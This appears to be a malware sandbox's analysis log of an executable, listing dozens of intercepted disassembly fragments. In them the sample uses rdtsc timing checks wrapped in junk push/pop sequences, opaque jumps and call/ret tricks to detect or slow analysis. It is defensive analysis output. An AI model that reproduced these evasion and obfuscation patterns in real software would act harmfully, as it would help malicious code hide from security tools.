Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CED93 second address: 4CEDD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jne 00007F3B74DE4446h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007F3B74DE4452h 0x0000001b popad 0x0000001c push ecx 0x0000001d jl 00007F3B74DE4446h 0x00000023 pop ecx 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F3B74DE444Fh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CEDD8 second address: 4CEDDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CEDDE second address: 4CEE13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE4457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jmp 00007F3B74DE4450h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF721 second address: 4EF749 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3B7530A288h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F3B7530A299h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF749 second address: 4EF74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED670 second address: 4ED69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F3B7530A28Ch 0x0000000b jmp 00007F3B7530A297h 0x00000010 popad 0x00000011 push ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED9B1 second address: 4ED9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE458 second address: 4EE463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE463 second address: 4EE469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE469 second address: 4EE489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A296h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE489 second address: 4EE48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE48D second address: 4EE491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE910 second address: 4EE914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EEE91 second address: 4EEE96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EEE96 second address: 4EEE9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EEE9D second address: 4EEEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3B7530A290h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EEEB6 second address: 4EEEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EEEBA second address: 4EEED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F3B7530A28Eh 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EEED0 second address: 4EEED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EEED4 second address: 4EEEE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A28Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF1A2 second address: 4EF1B1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F3B74DE4446h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF2F0 second address: 4EF2F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF5CD second address: 4EF5DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3B74DE4446h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF5DC second address: 4EF5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0B82 second address: 4F0B92 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F3B74DE445Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0B92 second address: 4F0BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B7530A290h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0BA6 second address: 4F0BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0BAB second address: 4F0BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0BB1 second address: 4F0BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F32B4 second address: 4F32BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA675 second address: 4FA67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA67B second address: 4FA681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA681 second address: 4FA68E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F3B74DE4446h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA90C second address: 4FA912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA912 second address: 4FA91B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA91B second address: 4FA927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3B7530A286h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FAD40 second address: 4FAD47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB953 second address: 4FB957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBBB4 second address: 4FBBB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBBB8 second address: 4FBBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBBC1 second address: 4FBBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBD7D second address: 4FBD81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBE88 second address: 4FBE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBF1E second address: 4FBF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 jmp 00007F3B7530A28Fh 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jp 00007F3B7530A286h 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC367 second address: 4FC37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F3B74DE444Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC427 second address: 4FC42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC42E second address: 4FC450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE4455h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC450 second address: 4FC456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC456 second address: 4FC45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC45A second address: 4FC45E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC45E second address: 4FC477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 mov esi, 3CBA2200h 0x0000000e add di, 4A87h 0x00000013 nop 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC477 second address: 4FC47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC47B second address: 4FC48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F3B74DE4448h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC704 second address: 4FC708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC708 second address: 4FC70C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FCAEE second address: 4FCAF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FD8C7 second address: 4FD8E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jbe 00007F3B74DE4446h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 je 00007F3B74DE4450h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FEB30 second address: 4FEB36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FEB36 second address: 4FEB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF588 second address: 4FF5D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F3B7530A28Ah 0x0000000d nop 0x0000000e stc 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F3B7530A288h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b push ebx 0x0000002c sub dword ptr [ebp+122D1A2Dh], ecx 0x00000032 pop edi 0x00000033 mov dword ptr [ebp+122D2792h], edx 0x00000039 push 00000000h 0x0000003b xchg eax, ebx 0x0000003c pushad 0x0000003d jo 00007F3B7530A28Ch 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF32D second address: 4FF333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF5D5 second address: 4FF5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B7530A28Dh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500089 second address: 500093 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500093 second address: 500097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500097 second address: 5000B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE444Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d ja 00007F3B74DE4446h 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000B8 second address: 50010C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov edi, 6ED46C43h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F3B7530A288h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D19FEh], eax 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+1244B099h], edi 0x00000036 mov esi, 36E04A4Fh 0x0000003b xchg eax, ebx 0x0000003c jmp 00007F3B7530A28Bh 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 pop edi 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50010C second address: 500110 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500110 second address: 500116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500D76 second address: 500D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500D7C second address: 500D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500D80 second address: 500D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F3B74DE4458h 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F3B74DE4446h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500D97 second address: 500D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501882 second address: 501898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B74DE4451h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501898 second address: 501925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A28Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3B7530A293h 0x00000010 pop edx 0x00000011 nop 0x00000012 jng 00007F3B7530A28Ah 0x00000018 mov di, 20EAh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F3B7530A288h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007F3B7530A288h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 add esi, dword ptr [ebp+122D186Fh] 0x0000005a xchg eax, ebx 0x0000005b pushad 0x0000005c jnc 00007F3B7530A28Ch 0x00000062 push eax 0x00000063 push edx 0x00000064 jnp 00007F3B7530A286h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501925 second address: 501929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501929 second address: 50194A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3B7530A296h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502590 second address: 502595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50796F second address: 507973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507973 second address: 50797D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5092C8 second address: 5092CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B037 second address: 50B04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B74DE4453h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A280 second address: 50A298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3B7530A286h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B7530A28Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B04F second address: 50B0DD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3B74DE445Dh 0x00000008 jmp 00007F3B74DE4457h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 jo 00007F3B74DE444Ch 0x00000018 sub dword ptr [ebp+122D53D8h], edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F3B74DE4448h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a or dword ptr [ebp+122D18F5h], ebx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007F3B74DE4448h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c clc 0x0000005d add dword ptr [ebp+122D2C7Eh], ecx 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 push edi 0x00000068 pop edi 0x00000069 pushad 0x0000006a popad 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D122 second address: 50D142 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3B7530A293h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C2BF second address: 50C2CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B74DE444Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D142 second address: 50D147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D147 second address: 50D14D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C2CE second address: 50C2EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A290h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jne 00007F3B7530A286h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D14D second address: 50D151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
